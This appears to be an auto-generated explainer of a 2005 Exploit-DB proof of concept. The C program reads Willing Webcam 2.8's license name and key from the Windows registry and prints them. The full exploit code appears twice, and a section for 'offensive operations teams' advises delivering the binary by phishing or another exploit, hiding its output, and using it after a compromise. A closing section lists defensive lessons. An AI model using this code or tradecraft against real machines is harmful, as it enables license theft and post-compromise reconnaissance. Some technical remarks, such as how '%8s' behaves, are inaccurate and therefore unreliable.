Willing Webcam 2.8 License Information Disclosure Exploit Explained

What this paper is

This paper is an exploit proof-of-concept (PoC) demonstrating a vulnerability in Willing Webcam version 2.8 (and likely earlier versions). The vulnerability allows a local user to read sensitive license information, specifically the username and license key, from the Windows Registry. The exploit code is written in C and designed to be compiled and run on a Windows system.

Simple technical breakdown

The Willing Webcam software stores its license information (username and key) in the Windows Registry. This exploit works by directly accessing the registry using Windows API functions. It attempts to open a specific registry key associated with Willing Webcam. If successful, it then queries for the "Name" and "Key" values stored under that key. Finally, it prints these retrieved values to the console. If the software isn't installed or the registry key isn't found, it reports that.

Complete code and payload walkthrough

The provided code is a C program that interacts with the Windows Registry.

/*****************************************************************

Willing Webcam 2.8 licence info disclosure local exploit by Kozan

Application: Willing Webcam 2.8 (and probably prior versions)
Vendor: Willing Software - www.willingsoftware.com
Vulnerable Description: Willing Webcam 2.8 discloses licence
informations (username and key) to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*****************************************************************/

#include <stdio.h>
#include <windows.h>
#define BUF 100

int main()
{

       HKEY hKey; // Handle to a registry key
       char Name[BUF], Key[BUF]; // Buffers to store the retrieved license name and key
       DWORD dwBUFLEN = BUF; // Variable to hold the buffer size for registry queries
       LONG lRet; // Variable to store the return value of registry functions

       // Attempt to open the registry key for Willing Webcam
       if( RegOpenKeyEx(HKEY_CURRENT_USER, // Root key: Current user's registry hive
                                        "Software\\Willing Software\\Willing WebCam", // Path to the specific key
                                        0, // Reserved, must be zero
                                        KEY_QUERY_VALUE, // Access rights: Query values
                                        &hKey ) == ERROR_SUCCESS ) // Check if the key was opened successfully
       {
               // Query the "Name" value from the registry
               lRet = RegQueryValueEx(hKey, // Handle to an open key
                                        "Name", // Name of the registry value to query
                                        NULL, // Buffer to receive the type of the value (not needed here)
                                        NULL, // Buffer to receive the size of the value's data (not needed here)
                                        (LPBYTE)Name, // Buffer to receive the value's data
                                        &dwBUFLEN); // Pointer to the size of the buffer
               // If query failed or data exceeds buffer size, set Name to "Not Found!"
               if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Name,"Not Found!");

               // Query the "Key" value from the registry
               lRet = RegQueryValueEx(hKey, // Handle to an open key
                                        "Key", // Name of the registry value to query
                                        NULL, // Buffer to receive the type of the value (not needed here)
                                        NULL, // Buffer to receive the size of the value's data (not needed here)
                                        (LPBYTE)Key, // Buffer to receive the value's data
                                        &dwBUFLEN); // Pointer to the size of the buffer
               // If query failed or data exceeds buffer size, set Key to "Not Found!"
               if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Key,"Not Found!");

               // Close the registry key handle
               RegCloseKey(hKey);

               // Print exploit information and the retrieved license details
               printf("Willing Webcam 2.8 Local Exploit by Kozan\n");
               printf("Credits to ATmaCA\n");
               printf("www.netmagister.com - www.spyinstructors.com \n");
               printf("kozan@netmagister.com\n\n");
               printf("Licence Name : %8s\n",Name); // %8s formats the string to be right-aligned in an 8-character field
               printf("Licence Key  : %8s\n",Key);
       }
       else
       {
               // If RegOpenKeyEx failed, the software is likely not installed
               printf("Willing Webcam 2.8 is not installed on your system!\n");
       }
       return 0; // Exit the program
}

// milw0rm.com [2005-07-04]

Code Fragment/Block -> Practical Purpose Mapping:

• /****************...*****************/: This is a multi-line comment block providing metadata about the exploit: author, application, vendor, vulnerability description, credits, and contact information.
• #include <stdio.h>: Includes the standard input/output library, providing functions like printf.
• #include <windows.h>: Includes the Windows API header file, essential for interacting with the operating system, including registry functions.
• #define BUF 100: Defines a constant BUF with a value of 100. This is used to set the size of character arrays (Name and Key) that will store the license information.
• int main(): The main function where program execution begins.
• HKEY hKey;: Declares a variable hKey of type HKEY. This is a handle that will represent an open registry key.
• char Name[BUF], Key[BUF];: Declares two character arrays, Name and Key, each capable of holding up to BUF (100) characters. These will store the retrieved license username and key, respectively.
• DWORD dwBUFLEN = BUF;: Declares a DWORD (Double Word, typically 32-bit unsigned integer) variable dwBUFLEN and initializes it with the value of BUF (100). This variable is used with RegQueryValueEx to specify the size of the buffer and to receive the actual size of the data read.
• LONG lRet;: Declares a LONG variable lRet to store the return status code from Windows API functions, particularly registry operations.
• if( RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Willing Software\\Willing WebCam", 0, KEY_QUERY_VALUE, &hKey ) == ERROR_SUCCESS ): This is the core of the exploit's interaction with the registry.
  • RegOpenKeyEx: A Windows API function to open a registry key.
  • HKEY_CURRENT_USER: Specifies that the operation should be performed on the registry hive for the currently logged-in user.
  • "Software\\Willing Software\\Willing WebCam": The specific path to the registry key where Willing Webcam stores its configuration.
  • 0: Reserved parameter, must be zero.
  • KEY_QUERY_VALUE: Specifies the desired access rights. In this case, it's to query the values within the key.
  • &hKey: A pointer to an HKEY variable. If the key is opened successfully, hKey will be populated with a handle to the opened key.
  • == ERROR_SUCCESS: Checks if the RegOpenKeyEx function returned a success code.
• lRet = RegQueryValueEx(hKey, "Name", NULL, NULL, (LPBYTE)Name, &dwBUFLEN);: This line queries the "Name" registry value.
  • RegQueryValueEx: A Windows API function to retrieve the data and type of a specified registry value.
  • hKey: The handle to the open registry key obtained from RegOpenKeyEx.
  • "Name": The name of the registry value to query.
  • NULL, NULL: These parameters are for receiving the value's type and the size of the data, respectively. They are not needed for this exploit, so they are set to NULL.
  • (LPBYTE)Name: A pointer to the buffer (Name character array) where the retrieved data will be stored. LPBYTE is a pointer to a byte.
  • &dwBUFLEN: A pointer to the DWORD variable that holds the size of the buffer. After the call, it will contain the actual size of the data read.
• if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Name,"Not Found!");: This conditional statement checks for errors during the RegQueryValueEx call.
  • lRet != ERROR_SUCCESS: Checks if the registry query failed.
  • dwBUFLEN > BUF: Checks if the retrieved data is larger than the allocated buffer (BUF).
  • strcpy(Name,"Not Found!");: If either condition is true, the Name buffer is overwritten with the string "Not Found!".
• lRet = RegQueryValueEx(hKey, "Key", NULL, NULL, (LPBYTE)Key, &dwBUFLEN);: Similar to the query for "Name", this line queries the "Key" registry value and stores it in the Key buffer. dwBUFLEN is reused and will be updated with the size of the "Key" data.
• if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Key,"Not Found!");: Handles errors or buffer overflows for the "Key" query, setting Key to "Not Found!" if necessary.
• RegCloseKey(hKey);: Closes the registry key handle previously opened by RegOpenKeyEx. This releases system resources.
• printf("Willing Webcam 2.8 Local Exploit by Kozan\n"); ... printf("kozan@netmagister.com\n\n");: These lines print informational messages about the exploit, its author, and contact details to the console.
• printf("Licence Name : %8s\n",Name);: Prints the retrieved license name. %8s is a format specifier that prints a string, right-aligned within a field of 8 characters.
• printf("Licence Key : %8s\n",Key);: Prints the retrieved license key, also right-aligned in an 8-character field.
• else { printf("Willing Webcam 2.8 is not installed on your system!\n"); }: This else block is executed if the initial RegOpenKeyEx call fails, indicating that the target registry key was not found, and thus the software is likely not installed.
• return 0;: Indicates successful program termination.

Payload/Shellcode:

There is no shellcode or executable payload in the traditional sense within this C code. The "payload" is the act of reading and displaying the license information. The program itself, once compiled and executed, is the payload. It doesn't download or execute further malicious code.

Practical details for offensive operations teams

• Required Access Level: Local user access. The exploit targets registry keys under HKEY_CURRENT_USER, which are accessible by any logged-in user. No administrative privileges are required.
• Lab Preconditions:
  • A Windows operating system.
  • Willing Webcam version 2.8 (or a vulnerable prior version) must be installed on the target machine.
  • The software must have been registered by a user, meaning the license information must exist in the registry.
• Tooling Assumptions:
  • A C compiler for Windows (e.g., MinGW, Visual Studio).
  • The compiled executable can be delivered via various means (e.g., phishing, social engineering, dropped by another exploit).
• Execution Pitfalls:
  • Software Not Installed: The primary failure point is if Willing Webcam 2.8 is not installed or if the registry path is different for other versions. The exploit will simply report "Willing Webcam 2.8 is not installed on your system!".
  • No License Entered: If the software is installed but never registered, the registry values for "Name" and "Key" might not exist, leading to "Not Found!" output for those fields.
  • Registry Permissions: While HKEY_CURRENT_USER is generally accessible, extremely restrictive security policies could theoretically prevent even KEY_QUERY_VALUE access, though this is rare for standard user accounts.
  • Buffer Overflow (Minor): The dwBUFLEN > BUF check is a basic safeguard. If the license key were exceptionally long (over 99 characters), it would be truncated and reported as "Not Found!". This is unlikely for typical license keys.
• Tradecraft Considerations:
  • Stealth: This exploit is noisy on the local machine as it prints output to the console. For stealthier operations, the printf statements could be redirected to a file, or the output could be captured by a parent process.
  • Information Gathering: This exploit is a valuable post-exploitation tool. Once initial access is gained, running this can reveal license keys that might be useful for pivoting or identifying other software assets.
  • Delivery: The compiled .exe file is small and can be easily delivered. However, antivirus software might flag it if signature-based detection is active.

Where this was used and when

• Discovery and Publication: The exploit was discovered and published by Kozan in July 2005.
• Usage Contexts:
  • Academic/Research: Used by security researchers to demonstrate vulnerabilities in software licensing mechanisms and registry security.
  • Unauthorized Access: Potentially used by attackers to gather license keys for software piracy or to identify software installed on a compromised system for further exploitation.
  • System Administration (Legitimate Use): While not an exploit in this context, the underlying registry access technique could be used by administrators to audit software licenses if they had legitimate reasons and permissions.

Defensive lessons for modern teams

• Secure Storage of Sensitive Data: Never store sensitive information like license keys or credentials in plain text in the registry or configuration files. Use encrypted storage mechanisms or secure credential management systems.
• Principle of Least Privilege: Applications should only have the necessary permissions to access system resources. Willing Webcam, by storing license keys in a readable registry location, violated this principle.
• Registry Hardening: Implement stricter permissions on registry keys, especially those related to application configurations, to prevent unauthorized reading of sensitive data.
• Regular Patching and Updates: While this exploit is old, it highlights the importance of keeping all software, including utility applications, updated to patch known vulnerabilities.
• Endpoint Detection and Response (EDR): Modern EDR solutions can detect suspicious registry access patterns, such as RegOpenKeyEx and RegQueryValueEx calls to known sensitive locations, even if the application itself is legitimate.
• Application Security Testing: Developers should regularly perform security testing (including static and dynamic analysis) on their applications to identify and remediate vulnerabilities before deployment.

ASCII visual (if applicable)

This exploit is a direct interaction with the operating system's registry. A visual representation of the flow is straightforward:

+-------------------+      +-----------------------+      +-----------------------+
| Attacker's Process|----->| Windows Registry      |<-----| Willing Webcam        |
| (Exploit Executable)|      | (HKEY_CURRENT_USER)   |      | (Installed Software)  |
+-------------------+      +-----------------------+      +-----------------------+
        |                        |
        | 1. RegOpenKeyEx        | 2. Stores License Info
        |    (Software\Willing  |    (Name, Key)
        |     Software\Willing   |
        |     WebCam)            |
        |                        |
        | 3. RegQueryValueEx     |
        |    ("Name", "Key")     |
        |                        |
        v                        |
+-------------------+            |
| Output to Console |------------+
| (License Name/Key)|
+-------------------+

Explanation:

1. The attacker's process (the compiled exploit) uses RegOpenKeyEx to request access to a specific registry key associated with Willing Webcam.
2. The Windows Registry, managed by the operating system, stores configuration data for installed applications. Willing Webcam stores its license information here.
3. The exploit then uses RegQueryValueEx to read the "Name" and "Key" values from the opened registry key.
4. Finally, the exploit displays the retrieved license information to the console.

Source references

• Paper Title: Willing Webcam 2.8 - Licence Information Disclosure
• Author: Kozan
• Published: 2005-07-04
• Keywords: Windows, local
• Exploit-DB Paper URL: https://www.exploit-db.com/papers/1085
• Exploit-DB Raw URL: https://www.exploit-db.com/raw/1085

Original Exploit-DB Content (Verbatim)

/*****************************************************************

Willing Webcam 2.8 licence info disclosure local exploit by Kozan

Application: Willing Webcam 2.8 (and probably prior versions)
Vendor: Willing Software - www.willingsoftware.com
Vulnerable Description: Willing Webcam 2.8 discloses licence
informations (username and key) to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*****************************************************************/

#include <stdio.h>
#include <windows.h>
#define BUF 100

int main()
{

       HKEY hKey;
       char Name[BUF], Key[BUF];
       DWORD dwBUFLEN = BUF;
       LONG lRet;

       if( RegOpenKeyEx(HKEY_CURRENT_USER,
                                        "Software\\Willing Software\\Willing WebCam",
                                        0,
                                        KEY_QUERY_VALUE,
                                        &hKey ) == ERROR_SUCCESS )
       {
               lRet = RegQueryValueEx(hKey, "Name", NULL, NULL, (LPBYTE)Name, &dwBUFLEN);
               if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Name,"Not Found!");

               lRet = RegQueryValueEx(hKey, "Key", NULL, NULL, (LPBYTE)Key, &dwBUFLEN);
               if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Key,"Not Found!");

               RegCloseKey(hKey);

               printf("Willing Webcam 2.8 Local Exploit by Kozan\n");
               printf("Credits to ATmaCA\n");
               printf("www.netmagister.com - www.spyinstructors.com \n");
               printf("kozan@netmagister.com\n\n");
               printf("Licence Name : %8s\n",Name);
               printf("Licence Key  : %8s\n",Key);
       }
       else
       {
               printf("Willing Webcam 2.8 is not installed on your system!\n");
       }
       return 0;
}

// milw0rm.com [2005-07-04]